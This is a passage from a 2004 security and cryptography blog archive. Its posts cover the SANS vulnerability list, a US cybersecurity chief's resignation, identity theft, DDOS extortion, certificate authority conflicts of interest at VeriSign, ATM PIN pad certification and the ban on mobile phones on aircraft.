    The bias is what bothers. The Windows side is written with excrutiating care to avoid pointing any blame at Microsoft. For example, wherever possible, general cases are introduced with lists of competing products, before concentrating on how it afflcts Microsoft product in particular. Also, the word Microsoft appears with only positive connotations: You have this Microsoft security tool, whereas you have a buggy Windows application.

    One would think that such a bias is just a reflection of SANS' use of institutions and vendors as the source of its security info. For example, "p2p file sharing" is now alleged to be a "vulnerability" which has to be a reflection of the FBI responding to the RIAA over falling sales of CD music.

    But what did strike me as totally weird was that phishing wasn't mentioned!

    Huh? Surely there can't be a security person on the planet who hasn't heard of phishing and realised that it's one of the top serious issues? Why would SANS not list it as a vulnerability? Is the FBI too busy worrying about Hollywood's bottom lines to concentrate on theft from banks and other payment operators?

    The answer is, I think, that the list only includes stuff for which there is a solution. Looking at the website confirms that SANS sells solutions. Scads of them, in fact. Well, it can't sell a solution for phishing because ... there isn't a solution to be sold. Not yet, at least.

    Which is to say that the list is misnamed, it's the top 20 solutions we can sell you: SANS says they are "The Trusted Source for Computer Security Training, Certification and Research" and it's unlikely that they can instill that trust in their customers if they teach about a vulnerability they can't also solve.

    No doubt they are working on one, as are hundreds of other security vendors. But it does leave one wondering how we go about securing the net when security itself is coopted to other agendas.

    Posted by iang at 07:51 AM | Comments (2) | TrackBack

    October 04, 2004

    Amit Yoran - cybersecurity czar - resigns!

    It was an impossible task anyway, and more kudos to Amit Yoran for resigning. News that he has quit the so-called "cybersecurity czar" position in the US means that one more person is now available to do good security work out in the private sector.

    When it comes to securing cyberspace, we can pretty much guarantee that the less the government (any, you pick) does the better. They will always be behind the game, and always subject to massive pressure from large companies selling snake oil. Security is a game where you only know when you fail, which makes it strongly susceptible to brand, hype, finger pointing and other scams.

    There is one thing that the government (specifically, the US federal government this time) could have done to seriously improve our chances of a secure net, and that was to get out of crypto regulation. There was no movement on that issue, so crypto remains in this sort of half-bad half-good limbo area of weakened regulatory controls (open software crypto is .. free, but not the rest). The result of the January 2000 easing was as planned (yes, this is documented strategy): it knocked the stuffing out of the free community's independent push, while still leaving real product skipping crypto because of the costs.

    IMNSHO the reason we have phishing, rampant hacking, malware, and countless other plagues is because the US government decided back in days of post-WWII euphoria that people didn't need crypto. Think about it: we built the net, now why can't we secure it?

    For about 60 years or more, any large company getting into crypto has had to deal with .. difficulties. (Don't believe me, ask Sun why they ship Java in "crippled mode.") This is called "barriers to entry" which results in a small group of large companies arising to dominate the field, which further sets the scene for expensive junk masquerading as security.

    In the absence of barriers to entry, we'd expect knowledge dispersed and acted upon in a regular fashion just like the rest of the net intellectual capital. Yet, any specialist has to run the gauntlet of .. issues of integrity. Work on free stuff and starve, or join a large company and find yourself polishing hypeware with snake oil.

    Of course it's not as bad as I make out. But neither is it as good as some claim it. Fact is, crypto is not deployed like relational databases, networking protocols, virtual machine languages or any of the other 100 or so wonderful and complex technologies we developed, mastered and deployed in the free world known as the Internet. And there's no good reason for that, only bad reasons: US government policy remains anti-crypto, which means US government policy is to not have a secure Internet.

    ==============================

    'Frustrated' U.S. Cybersecurity Chief Abruptly Resigns

    POSTED: 11:32 AM EDT October 1, 2004
    WASHINGTON -- The government's cybersecurity chief has abruptly resigned after one year with the Department of Homeland Security, confiding to industry colleagues his frustration over what he considers a lack of attention paid to computer security issues within the agency.

    Amit Yoran, a former software executive from Symantec Corp., informed the White House about his plans to quit as director of the National Cyber Security Division and made his resignation effective at the end of Thursday, effectively giving a single's day notice of his intentions to leave.

    Yoran said Friday he "felt the timing was right to pursue other opportunities." It was unclear immediately who might succeed him even temporarily. Yoran's deputy is Donald "Andy" Purdy, a former senior adviser to the White House on cybersecurity issues.

    Yoran has privately described frustrations in recent months to colleagues in the technology industry, according to lobbyists who recounted these conversations on condition they not be identified because the talks were personal.

    As cybersecurity chief, Yoran and his division - with an $80 million budget and 60 employees - were responsible for carrying out dozens of recommendations in the Bush administration's "National Strategy to Secure Cyberspace," a set of proposals to better protect computer networks.

    Yoran's position as a director -- at least three steps beneath Homeland Security Secretary Tom Ridge -- has irritated the technology industry and even some lawmakers. They have pressed unsuccessfully in recent months to elevate Yoran's role to that of an assistant secretary, which could mean broader authority and more money for cybersecurity issues.

    "Amit's decision to step down is unfortunate and certainly will set back efforts until more leadership is demonstrated by the Department of Homeland Security to solve this problem," said Paul Kurtz, a former cybersecurity official on the White House National Security Council and now head of the Washington-based Cyber Security Industry Alliance, a trade group.

    Under Yoran, Homeland Security established an ambitious new cyber alert system, which sends urgent e-mails to subscribers about major virus outbreaks and other Internet attacks as they occur, along with detailed instructions to help computer users protect themselves.

    It also mapped the government's universe of connected electronic devices, the first step toward scanning them systematically for weaknesses that could be exploited by hackers or foreign governments. And it began routinely identifying U.S. computers and networks that were victims of break-ins.

    Yoran effectively replaced a position once held by Richard Clarke, a special adviser to President Bush, and Howard Schmidt, who succeeded Clarke but left government during the formation of the Department of Homeland Security to work as chief security officer at eBay Inc.

    Yoran cofounded Riptech Inc. of Alexandria, Va., in March 1998, which monitored government and corporate computers around the world with an elaborate sensor network to protect against attacks. He sold the firm in July 2002 to Symantec for $145 million and stayed on as vice president for managed security services.

    Copyright 2004 by The Associated Press. All rights reserved. This material may not be published, broadcast, rewritten or redistributed.


    Addendum: 2004.10.07: The administration's rapid response: Cybersecurity expert Howard Schmidt returning to DHS

    Posted by iang at 06:33 PM | Comments (1) | TrackBack

    October 02, 2004

    Identity theft - buy a Mac, download Firefox

    In the "war on phishing" which has yet to be declared, there is little good news. It continues to increase, identity theft is swamping the police departments, and obscure efforts by the RIAA to assert that CD pirating is now linked to financing of terrorism grab the headlines [1]. Here's a good article on the victims, and the woe that befalls the common man of the net, while waiting for something to be done about it [2].

    Meantime, what to do? Phishing won't stop until the browser manufacturers - Microsoft, Mozilla, Konqueror, Opera - accept that it's an attack on the browser. The flood of viruses on Microsoft's installed base won't change any time soon, especiallly underscored by the SP2 message: Microsoft has shown there is no easy patch for a fundamentally broken system.

    Don't hold your breath, it will take years. In the meantime, the only thing I can think of for the embattled ordinary user is this: buy a Mac and download Firefox. That won't stop the phishing, but at least they are sufficiently inured against viruses that you won't have to worry about that threat.

    [1] http://go.theregister.com/news/2004/09/28/terrorist_email_scams/
    [2] http://www.theregister.co.uk/2004/09/24/identity_snatchers/


    Invasion of the identity snatchers
    By Kelly Martin, SecurityFocus (kel at securityfocus.com)
    Published Friday 24th September 2004 11:32 GMT

    Last year I was the victim of identity theft, a sobering reality in today's world. An unscrupulous criminal managed to social engineer his way past the formidable security checks and balances provided by my credit card company, my bank, and one of my investment accounts. He methodically researched my background and personal information until he could successfully impersonate me, and then subsequently set forth to change the mailing addresses of my most important financial statements.

    It was a harrowing experience, and one worth explaining in the context of the online world. Numerous visits to the local police and the Canadian RCMP revealed some rather surprising things: identity theft is already so common that there are entire units within law enforcement that deal with this issue every day. They have toll-free numbers, websites and documents that clearly define their incident response procedures. But the reality is, law enforcement will respond to these issues just as you might expect: with phone calls, in-person interviews, and some traditional detective work. It's still very much an analog world around us.

    The other thing that became crystal clear during the process of regaining my own identity is this: for as capable as they may be, law enforcement is woefully ill-equipped to track down identity theft that starts online. As a security professional with a healthy dose of paranoia, I was confident that my online identity had not been compromised - a more traditional approach had been used. But with the sophistication of today's viruses, millions of others cannot say the same thing.

    While not all identity theft starts online, the fact is that online identity theft is now incredibly easy to do. The same methodical, traditional approach that was used to steal my identity by placing phone calls is being sped up, improved upon, and made ever more lethal by first attacking the victim online. Your banking and credit card information can come later.

    We all know how commonplace these technologies already are: keyloggers, Trojans with remote-control capabilities and even webcam control, and backdoors that give access to all your files. There are millions of these installed on infected machines all over the world, lurking in the shadows.

    Ever do your taxes on your home computer? All it takes is one Social Insurance Number (or Social Security Number in America), plus some really basic personal information, and you're sunk. Every nugget of information can be worth its weight in gold if, for example, that online banking password that was just logged enables someone to change your address and then, a month later, take out a loan in your name.

    The rise of phishing scams over the past two years alludes to this growing menace: your personal information, especially your banking and credit card information, has significant value to a criminal. No surprise there.

    Working in the security field, many of us know people who are regularly infected with viruses, worms, Trojans. When it gets bad enough, they reformat and reinstall. I can't count the number of times I've heard people tell me that they're not overly concerned, as they believe that the (often, minimal) personal information on their computer is not inherently valuable. They've clearly never had their personal information put to ill use.

    As I was reading the new Threat Report from Symantec, which documents historical virus trends, only the biggest numbers jumped out at me. The average time from vulnerability to exploit is now just 5.8 days. Some 40 per cent of Fortune 100 companies had been infected with worms over a period of six months. There were 4,496 new Microsoft Windows viruses discovered in six months, or an average of 24 new viruses every day. Basically, the epidemic is out of control.

    With a few exceptions, however, the most popular and most prominent viruses and worms are not the ones that will be used to steal your identity. It's that carefully crafted email, or that feature-rich and bloated Trojan, that will be used in covert attempts.

    Perhaps a suitable solution to the epidemic is a rather old one, and one that I employ myself: encryption of all the personal data that is deemed valuable. I'm not talking about your pictures of Aunt Tilly or your music archive - I'm referring to your tax returns, your financial information, your bill payments, etc. This approach still won't avoid the keyloggers or that remote control Trojan that's sitting on your drive, but it does help to avoid new surprises and mistaken clicks.

    And to those users out there whom we deal with everyday and who still say there's nothing important on their computer that requires them to care about today's worms, Trojans, viruses, and so on, the day their own information is stolen and used against them is growing ever more near.

    Copyright © 2004, SecurityFocus logo (http://www.securityfocus.com/)

    Posted by iang at 10:22 AM | Comments (4) | TrackBack

    September 28, 2004

    The DDOS dilemma - change the mantra

    The DDOS (distributed denial of service) attack is now a mainstream threat. It's always been a threat, but in some sense or other, it's been possible to pass it off. Either it happens to "those guys" and we aren't effected. Or, the nuisance factor of some hacker launching a DOS on our ISP is dealt with by waiting.

    Or we do what the security folks do, which is to say we can't do anything about it, so we won't. Ignoring it is the security standard. I've been guilty of it myself, on both sides of the argument: Do X because it would help with DOS, to which the response is, forget it, it won't stop the DOS.

    But DOS has changed. First to DDOS - distributed denial of service. And now, the application of DDOS has become over the last year or two so well institutionalised that it is a frequent extortion tool.

    Authorize.com, a processor of credit cards, suffered a sustained extortion attack last week. The company has taken a blow as merchants have deserted in droves. Of course, they need to, because they need their payments to keep their own businesses alive. This signals a shift in Internet attacks to a systemic phase - an attack on a payment processor is an attack on all its customers as well.

    Hunting around for some experience, Gordon of KatzGlobal.com gave this list of motives for DDOS:

    Great list, Gordon! He reports that extortion attacks are 1 in 100 of the normal, and I'm not sure whether to be happier or more worried.

    So what to do about DDOS? Well, the first thing that has to be addressed is the security mantra of "we can't do anything about it, so we'll ignore it." I think there are a few things to do.

    Firstly, change the objective of security efforts from "stop it" to "not make it worse." That is, a security protocol, when employed, should work as well as the insecure alternative when under DOS conditions. And thus, the user of the security protocol should not feel the need to drop the security and go for the insecure alternative.

    Perhaps better put as: a security protocol should be DOS-neutral.

    Connection oriented security protocols have this drawback - SSL and SSH both add delay to the opening of their secure connection from client to server. Packet-oriented or request-response protocols should not, if they are capable of launching with all the crypto included in one packet. For example, OpenPGP mail sends one mail message, which is exactly the same as if it was a cleartext mail. (It's not even necessarily bigger, as OpenPGP mails are compressed.) OpenPGP is thus DOS-neutral.

    This makes sense, as connection-oriented protocols are bad for security and reliability. About the best thing you can do if you are stuck with a connection-oriented architecture is to turn it immediately into a message-based architecture, so as to minimise the cost. And, from a DOS pov, it seems that this would bring about a more level playing field.

    A second thing to look at is to be DNS neutral. This means not being slavishly dependent on DNS to convert ones domain names (like www.financialcryptography.com) into the IP number (like 62.49.250.18). Old timers will point out that this still leaves one open to an IP-number-based attack, but that's just the escapism we are trying to avoid. Let's close up the holes and look at what's left.

    Finally, I suspect there is merit in make-work strategies in order to further level the playing field. Think of hashcash. Here, a client does some terribly boring and long calculation to calculate a valid hash that collides with another. Because secure message digests are generally random in their appearance, finding one that is not is lots of work.

    So how do we use this? Well, one way to flood a service is to send in lots of bogus requests. Each of these requests has to be processed fully, and if you are familiar with the way servers are moving, you'll understand the power needed for each request. More crypto, more database requests, that sort of thing. It's easy to flood them by generating junk requests, which is far easier to do than to generate a real request.

    The solution then may be to put guards further out, and insist the client matches the server load, or exceeds it. Under DOS conditions, the guards far out on the net look at packets and return errors if the work factor is not sufficient. The error returned can include the current to-the-minute standard. A valid client with one honest request can spend a minute calculating. A DDOS attack will then have to do much the same - each minute, using the new work factor paramaters.

    Will it work? Who knows - until we try it. The reason I think of this is that it is the way many of our systems are already structured - a busy tight center, and a lot of smaller lazy guards out front. Think Akamai, think smart firewalls, think SSL boxes.

    The essence though is to start thinking about it. It's time to change the mantra - DOS should be considered in the security equation, if only at the standards of neutrality. Just because we can't stop DOS, it is no longer acceptable to say we ignore it.

    Posted by iang at 06:38 AM | Comments (5) | TrackBack

    September 22, 2004

    WebTrust: "It's about not causing popups..."

    WebTrust is the organisation that sets auditing standards for certificate authorities. It's motto, "It's a matter of trust," is of course the marketing message they want you to absorb, and subject to skepticism. How deliciously ironic, then, that when you go to their site, click on Contact, you get redirected to another domain that uses the wrong certificate!

    http://www.cpawebtrust.org/ is the immoral re-user of WebTrust's certificate. It's a presumption that the second domain belongs to the same organisation (the American Institute of Certified Public Accountants, AICPA), but the information in whois doesn't really clear that up due to conflicts and bad names.

    What have WebTrust discovered? That certificates are messy, and are thus costly. This little cert mess is going to cost them a few thousand to sort out, in admin time, sign-off, etc etc. Luckily, they know how to do this, because they're in the business of auditing CAs, but they might also stop to consider that this cost is being asked of millions of small businesses, and this might be why certificate use is so low.

    Posted by iang at 07:04 AM | Comments (0) | TrackBack

    September 01, 2004

    VeriSign's conflict of interest creates new threat

    There's a big debate going on the US and Canada about who is going to pay for Internet wire tapping. In case you hadn't been keeping up, Internet wire-tapping *is* coming. The inevitability of it is underscored by the last ditched efforts of the ISPs to refer to older Supreme Court rulings that the cost should be picked up by those requiring the wire tap. I.e., it's established in US law that the cops should pay for each wiretap [1].

    I got twigged to a new issue by an article [2] that said:

    "To make wiretapping possible, Internet phone companies have to buy equipment and software as well as hire technicians, or contract with VeriSign or one of its competitors. The costs could run into the millions of dollars, depending on the size of the Internet phone company and the number of government requests."

    What caught me by surprise was the mention of Verisign. So I looked, and it seems they *are indeed* in the business of subpoena compliance [3]. I know most won't believe me, given their public image as a trusted ecommerce player, so here's the full page:

    NetDiscovery Service for CALEA Compliance

    Complete Lawful Intercept Service

    VeriSigns NetDiscovery service provides telecom network operators, cable operators, and Internet service providers with a streamlined service to help meet requirements for assisting government agencies with lawful interception and subpoena requests for subscriber records. Net Discovery is the premier turnkey service for provisioning, access, delivery, and collection of call information from operators to law enforcement agencies (LEAs).

    Reduce Operating Expenses

    Compliance also requires companies to maintain extensive records and respond to government requests for information. The NetDiscovery service converts content into required formats and delivers the data directly to LEA facilities. Streamlined administrative services handle the provisioning of lawful interception services and manage system upgrades.

    One Connection to LEAs

    Compliance may require substantial capital investment in network elements and security to support multiple intercepts and numerous law enforcement agencies (LEAs). One connection to VeriSign provides provisioning, access, and delivery of call information from carriers to LEAs.

    Industry Expertise for Continued Compliance

    VeriSign works with government agencies and LEAs to stay up-to-date with applicable requirements. NetDiscovery customers benefit from quick implementation and consistent compliance through a single provider.

    CALEA is the name of the bill that mandates law enforcement agency (LEA) access to telcos - each access should carry a cost. The cops don't want to pay for it, and neither do the suppliers. Not to mention, nobody really wants to do this. So in steps VeriSign with a managed service to handle wiretaps, eavesdropping, and other compliance tasks as directed under subpoena. On first blush, very convenient!

    Here's where the reality meter goes into overdrive. VeriSign is also the company that sells about half of the net's SSL certificates for "secure ecommerce [4]." These SSL certificates are what presumptively protect connections between consumers and merchants. It is claimed that a certificate that is signed by a certificate authority (CA) can protect against the man-in-the-middle (MITM) attack and also domain name spoofing. In security reality, this is arguable - they haven't done much of a job against phishing so far, and their protection against some other MITMs is somewhere between academic and theoretical [5].

    A further irony is that VeriSign also runs the domain name system for the .com and the .net domains. So, indeed, they do have a hand in the business of domain name spoofing; the trivial ease of mounting this attack has in many ways influenced the net's security architecture by raising domain spoofing to something that has to be protected against [6]. But so far nothing much serious has come of that [7].

    But getting back to the topic of the MITM protection afforded by those expensive VeriSign certificates. The point here is that, on the one hand, VeriSign is offering protection from snooping, and on the other hand, is offering to facilitate the process of snooping.

    The fox guarding the chicken coop?

    Nobody can argue the synergies that come from the engineering aspects of such a mix: we engineers have to know how to attack it in order to defend it. This is partly the origin of the term "hacker," being one who has to crack into machines ... so he can learn to defend.

    But there are no such synergies in governance, nor I fear in marketing. Can you say "conflict of interest?" What is one to make of a company that on the one hand offers you a "trustworthy" protection against attack, and on the other hand offers a service to a most likely attacker [8]?

    Marketing types, SSL security apologists and other friends of VeriSign will all leap to their defence here and say that no such is possible. Or even if it was, there are safeguards. Hold on to that thought for a moment, and let's walk through it.

    How to MITM the CA-signed Cert, in one easy lesson

    Discussions on the cryptography list recently brought up the rather stunning observation that the Certificate Authority (CA) can always issue a forged certificate and there is no way to stop this. Most attack models on the CA had assumed an external threat; few consider the insider threat. And fair enough, why would the CA want to issue a bogus cert?

    In fact the whole point of the PKI exercise was that the CA is trusted. All of the assumptions within secure browsing point at needing a trusted third party to intermediate between two participants (consumer and merchant), so the CA was designed by definition to be that trusted party.

    Until we get to VeriSign's compliance division that is. Here, VeriSign's role is to facilitate the "provisioning of lawful interception services" with its customers, ISPs amongst them [9]. Such services might be invoked from a subpoena to listen to the traffic of some poor Alice, even if said traffic is encrypted.

    Now, we know that VeriSign can issue a certificate for any one of their customers. So if Alice is protected by a VeriSign cert, it is an easy technical matter for VeriSign, pursuant to subpoena or other court order, to issue a new cert that allows them to man-in-the-middle the naive and trusting Alice [10].

    It gets better, or worse, depending on your point of view. Due to a bug in the PKI (the public key infrastructure based on x.509 keys that manages keys for SSL), all CAs are equally trusted. That is, there is no firewall between one certificate authority and another, so VeriSign can issue a cert to MITM *any* other CA-issued cert, and every browser will accept it without saying boo [11].

    Technically, VeriSign has the skills, they have the root certificate and now they are in the right place. MITM never got any easier [12]. Conceivably, under orders from the court Verisign would now be willing to conduct an MITM against its own customers and its own certs, in every place that it has a contract for LEA compliance.

    Governance? What Governance?

    All that remains is the question of whether VeriSign would do such a thing. The answer is almost certainly yes: Normally, one would say that the user's contract, the code of practice, and the WebTrust audit would prevent such a thing. After all, that was the point of all the governance and contracts and signing laws that VeriSign wrote back in the mid 90s - to make the CA into a trusted third party.

    But, a court order trumps all that. Judges strike down contract clauses, and in the English common law and the UCC, which is presumably what VeriSign uses, a judge can strike out clauses in the law or even write an entire law down.

    Further, the normal way to protect against over zealous insiders or conflicts of interests is to split the parties: one company issues the certs, and another breaches them. Clearly, the first company works for its clients and has a vested interest in protecting the clients. Such a CA will go to the judge and argue against a cert being breached, if it wants to keep selling its wares [13].

    Yet, in VeriSign's case, it's also the agent for the ISP / telco - and they are the ones who get it in the neck. They are paying a darn sight more money to VeriSign to make this subpoena thing go away than ever Alice paid for her cert. So it comes down to "big ISP compliance contract" versus "one tiny little cert for a dirtbag who's probably a terrorist."

    The subpoena wins all ways, well assisted by economics. If the company is so ordered, it will comply, because it is its stated goal and mission to comply, and it's paid more to comply than to not comply.

    All that's left, then, is to trust in the fairness of the American juridical system. Surely such a fight of conscience would be publically viewed in the courts? Nope. All parties except the victim are agreed on the need to keep the interception secret. VeriSign is protected in its conflict of interest by the judge's order of silence on the parties. And if you've been following the news about PATRIOT 1,2, National Security Letters, watchlists, no-fly lists, suspension of habeus corpus, the Plame affair, the JTTF's political investigations and all the rest, you'll agree there isn't much hope there.

    What's are we to do about it?

    Then, what's VeriSign doing issuing certs? What's it doing claiming that users can trust it? And more apropos, do we care?

    It's pretty clear that all three of the functions mentioned today are real functions in the Internet market place. They will continue, regardless of our personal distaste. It's just as clear that a world of Internet wire-tapping is a reality.

    The real conflict of interest here is in a seller of certs also being a prime contractor for easy breachings of certs. As its the same company, and as both functions are free market functions, this is strictly an issue for the market to resolve. If conflict of interest means anything to you, and you require your certs to be issued by a party you can trust, then buy from a supplier that doesn't also work with LEAs under contract.

    At least then, when the subpoena hits, your cert signer will be working for you, and you alone, and may help by fighting the subpoena. That's what is meant by "conflict of interest."

    I certainly wouldn't recommend that we cry for the government to fix this. If you look at the history of these players, you can make a pretty fair case that government intervention is what got us here in the first place. So, no rulings from the Department of Commerce or the FCC, please, no antitrust law suits, and definitely no Star Chamber hearings!

    Yet, there are things that can be done. One thing falls under the rubric of regulation: ICANN controls the top level domain names, including .net and .com which are currently contracted to VeriSign. At least, ICANN claims titular control, and it fights against VeriSign, the Department of Commerce, various other big players, and a squillion lobbyists in exercising that control [14].

    It would seem that if conflict of interest counts for anything, removing the root server contracts from VeriSign would indicate displeasure at such a breach of confidence. Technically, this makes sense: since when did we expect DNS to be anything but a straight forward service to convert domain names into numbers? The notion that the company now has a vested interest in engaging in DNS spoofing raises a can of worms that I suspect even ICANN didn't expect. Being paid to spoof doesn't seem like it would be on the list of suitable synergies for a manager of root servers.

    Alternatively, VeriSign could voluntarily divest one or other of the snooping / anti-snooping businesses. The anti-snooping business would be then a potential choice to run the DNS roots, reflecting their natural alignments of interest.


    Addendum: 2nd February 2005. Adam Shostack and Ian Grigg have written to ICANN to stress the dangers in conflict of interest in selection of the new .net TLD.

    [1] This makes only sense. If the cops didn't pay, they'd have no brake on their activity, and they would abuse the privilege extended by the law and the courts.

    [2] Ken Belson, Wiretapping on the Net: Who pays? New York Times, http://www.iht.com/articles/535224.htm

    [3] VeriSign's pages on Calea Compliance and also Regulatory Compliance.

    [4] Check the great statistics over at SecuritySpace.com.

    [5] In brief, I know of these MITMs: phishing, click-thru-syndrome, CA-substitution. The last has never been exploited, to my knowledge, as most attacks bypass certificates, and attack the secure browsing system at the browser without presenting an SSL certificate.

    [6] , D. Atkins, R. Austein, Threat Analysis of the Domain Name System (DNS), RFC 3833.

    [7] There was the famous demonstration by some guy trying to get into the DNS business.

    [8] Most likely? 'fraid so. The MITM is extraordinarily rare - so rare that it is unmeasurable and to all practical intents and purposes, not a practical threat. But, as we shall see, this raises the prospects of a real threat.

    [9] VeriSign, op cit.

    [10] I'm skipping here the details of who Alice is, etc as they are not relevent. For the sake of the exercise, consider a secure web mail interface that is hosted in another country.

    [11] Is the all-CAs-are-equal bug written up anywhere?

    [12] There is an important point which I'm skipping here, that the MITM is way too hard under ordinary Internet circumstances to be a threat. For more on that, see Who's afraid of Mallory Wolf?.

    [13] This is what is happening in the cases of RIAA versus the ISPs.

    [14] Just this week: VeriSign to fight on after ICANN suit dismissed
    U.S. Federal District Court Dismisses VeriSign's Anti-Trust Claim Against ICANN with Prejudice and the Ruling from the Court.
    Today: VeriSign suing ICANN again

    Posted by iang at 06:20 AM | Comments (5) | TrackBack

    August 13, 2004

    How much to crack a PIN code entry device?

    All forms of security are about cost/benefit and risk analysis. But people have trouble with the notion that something is only secure up to a certain point [1]. So suppliers often pretend that their product is totally secure, which leads to interesting schisms between the security department and the marketing department.

    Secrecy is one essential tool in covering up the yawning gulf between the public's need to believe in absolute security, and the supplier's need to deliver a real product. Quite often, anything to do with security is kept secret. This is claimed to deliver more protection, but that protection, known as "security by obscurity," can lead to a false sense of security.

    In my experience, another effect often occurs: Institutional cognitive dissonance surrounding the myth of absolute security leads to security paralysis. Not only is the system secure, by fiat, but any attempt to point out the flaws is treated somewhere between an affront and a crime. Then, when the break occurs, regardless of the many unheeded warnings, widespread shock spreads rapidly as beliefs are shatttered.

    Anyway, getting to the point: banks and other FIs rarely reveal how much security is built in, using real numbers. Below, the article reveals a dollar number for an attack on a Pin Entry Device (PED). For those in a hurry, skip down to the emboldened sections, half way down.

    [1] addendum: This article, Getting Naked for Big Brother amply makes this point.



    Original URL: http://www.theregister.co.uk/2004/07/21/atm_keypad_security/
    The ATM keypad as security portcullis
    By Kevin Poulsen, SecurityFocus (klp at securityfocus.com)
    Published Wednesday 21st July 2004 09:38 GMT

    Behold the modern automated teller machine, a tiny mechanical fortress in a world of soft targets. But even with all those video cameras, audit trails, and steel reinforced cash vaults, wily thieves armed with social engineering techniques and street technology are still making bank. Now the financial industry is working to close one more chink in the ATM's armor: the humble PIN pad.

    Last year Visa International formally launched a 50-point security certification process for "PIN entry devices" (PEDs) on ATMs that accept Visa. The review is exhaustive: an independent laboratory opens up the PED and probes its innards; it examines the manufacturing process that produced the device; and it attacks the PED as an adversary might, monitoring it, for example, to ensure that no one can identify which buttons are being pressed by sound or electromagnetic emission. "If we are testing a product that is essentially compliant, we typically figure it's about a four week process," says Ken Kolstad, director of operations at California-based InfoGard, one of three certification labs approved by Visa International worldwide.
    Cash`n`Carrion

    If that seems like a lot of trouble over a numeric keypad, you haven't cracked open an ATM lately. The modern PED is a physically and logically self contained tamper-resistant unit that encrypts a PIN within milliseconds of its entry, and within centimeters of the customer's fingertips. The plaintext PIN never leaves the unit, never travels over the bank network, isn't even available to the ATM's processor: malicious code running on a fully compromised Windows-based ATM machine might be able to access the cash dispenser and spit out twenties, but in theory it couldn't obtain a customer's unencrypted ATM code.

    The credit card companies have played a large role in advancing the state of this obscure art. In additional to Visa's certification program, MasterCard has set an 1 April, 2005 deadline for ATMs that accept its card to switch their PIN encryption from DES to the more secure Triple DES algorithm (some large networks negotiated a more lenient deadline of December 2005). But despite these efforts, the financial sector continues to suffer massive losses to increasingly sophisticated ATM fraud artists, who take home some $50m a year in the U.S. alone, according to estimates by the Electronic Funds Transfer Association (EFTA). To make these mega withdrawals, swindlers have developed a variety of methods for cloning or stealing victim's ATM and credit cards.

    Some techniques are low-tech. In one scam that Visa says is on the rise, a thief inserts a specially-constructed sleeve in an ATM's card reader that physically captures the customer's card. The con artist then lingers near the machine and watches as the frustrated cardholder tries to get his card back by entering his PIN. When the customer walks away, the crook removes the sleeve with the card in it, and makes a withdrawal.

    At the more sophisticated end, police in Hong Kong and Brazil have found ATMs affixed with a hidden magstripe reader attached to mouth of the machine's real reader, expertly designed to look like part of the machine. The rogue reader skims each customer's card as it slides in. To get the PIN for the card, swindlers have used a wireless pinhole camera hidden in a pamphlet holder and trained on the PED, or attached fake PIN pads affixed over the real thing that store the keystrokes without interfering with the ATM's normal operation. "They'll create a phony card later and use that PIN," says Kurt Helwig, executive director of the EFTA. "They're getting pretty sophisticated on the hardware side, which is where the problem has been."

    Solenoid fingers

    Visa's certification requirements try to address that hardware assisted fraud. Under the company's standards, each PED must provide "a means to deter the visual observation of PIN values as they are being entered by the cardholder". And the devices must be sufficiently resistant to physical penetration so that opening one up and bugging it would either cause obvious external damage, cost a thief at least $25,000, or require that the crook take the PIN pad home with him for at least 10 hours to carry out the modification.

    "There are some mechanisms in place that help protect against some of these attacks... but there's no absolute security," says InfoGard's Kolstad. "We're doing the best we can to protect against it."

    That balancing approach - accounting for the costs of cracking security, instead of aspiring to be unbreakable - runs the length and breadth of Visa's PED security standards. Under one requirement, any electronics utilizing the encryption key must be confined to a single integrated circuit with a geometry of one micron or less, or be encased in Stycast epoxy. Another requirement posits an attacker with a stolen PED, a cloned ATM card, and knowledge of the cyphertext PIN for that card. To be compliant, the PED must contain some mechanism to prevent this notional villain from brute forcing the PIN with an array of computer-controlled solenoid fingers programmed to try all possible codes while monitoring the output of the PED for the known cyphertext.

    "In fact, these things are quite reasonable," says Hansup Kwon, CEO of Tranax Technologies, an ATM company that submitted three PEDs for approval to InfoGard. Before its PIN pads could be certified, Tranax had the change the design of the keycaps to eliminate nooks and crannies in which someone might hide a device capable of intercepting a cardholder's keystrokes. "We had to make the keypad completely visible from the outside, so if somebody attacks in between, it's complete visible," says Kwon.

    Where Visa went wrong, Kwon says, is in setting an unrealistic timetable for certification. When Visa launched the independent testing program last November, it set a 1 July deadline: any ATMs rolling into service after that date would have to have laboratory certified PIN pads, or they simply couldn't accept Visa cards.

    That put equipment makers in a tight spot, says Kwon. "It's almost a six months long process... If you make any design modification, it takes a minimum of three months or more to implement these changes," he says. "So there was not enough time to implement these things to meet the Visa deadline."

    Visa International's official position is that they gave manufactures plenty of time - 1 July saw 31 manufacturers with 105 PIN pads listed on the company's webpage of approved PEDs. But in late June, with the deadline less than a week away, Visa suddenly dropped the certification deadline altogether. "I think what we realized was that it was important to work with the other industry players," says spokesperson Sabine Middlemass.

    Visa says it's now working with rival MasterCard to develop an industry wide standard before setting a new deadline for mandatory compliance. In the meantime, the company is encouraging vendors to submit their PIN pads for certification under the old requirements anyway, voluntarily, for the sake of security.

    Copyright © 2004, 0 (http://www.securityfocus.com/)

    Posted by iang at 06:20 AM | Comments (1) | TrackBack

    August 11, 2004

    Cellphones on aircraft

    Ever since the BA crash in the early 90s, when an engine failed on takeoff, and the pilots shut down the wrong one from instrument confusion, mobile phones have been banned on British aircraft, and other countries more or less followed suit. Cell phones (mobiles, as they are called in many countries) were blamed initially, and as some say, it's guilty until proven innocent in air safety.

    Now there is talk of allowing them again [1] [2]. They should never have been banned in the first place. Here's why.

    (As a security engineer, it's often instructive to reverse-engineer the security decisions of other people's systems. Security is like economics, we don't get to try out our hypothesies except in real life. So we have to practice where we can. Here is a security-based analysis on whether it's safe to fly and dial.)

    In security, we need a valid threat. Imagined threats are a waste of time and money. Once we identify and validate the threat (normally, by the damage it does) we create a regime to protect it. Then, we conduct some sort of test to show that the protection works. Otherwise, we are again wasting our time and money. We would be negligent, as it were, because we are wasting the clients money and potentially worse if we get it wrong.

    Now consider pocket phones. It's pretty easy to see they are an imagined threat - there is no validated case [3]. But skip that part and consider the protection - banning mobile phones.

    Does it work? Hell no. If you have a 747 full of people, what is the statistical likelihood of people leaving their phone on accidentally? Quite significant, really. Enough that there is going to be a continual, ever present threat of transmissions. Inescapably, mobile phones are on when the plane takes off and lands - through shear accidental activity.

    In real safety systems, asking people not to do it is stupid. If it has to be stopped, it has to be stopped proactively. Which means one of three things:

    If planes are vulnerable, then the operators have to respond. As they haven't responded, we can easily conclude that the planes are not vulnerable. If it tuns out that they are vulnerable, then instead of the warnings being justified as some might have it, we have a different situation:

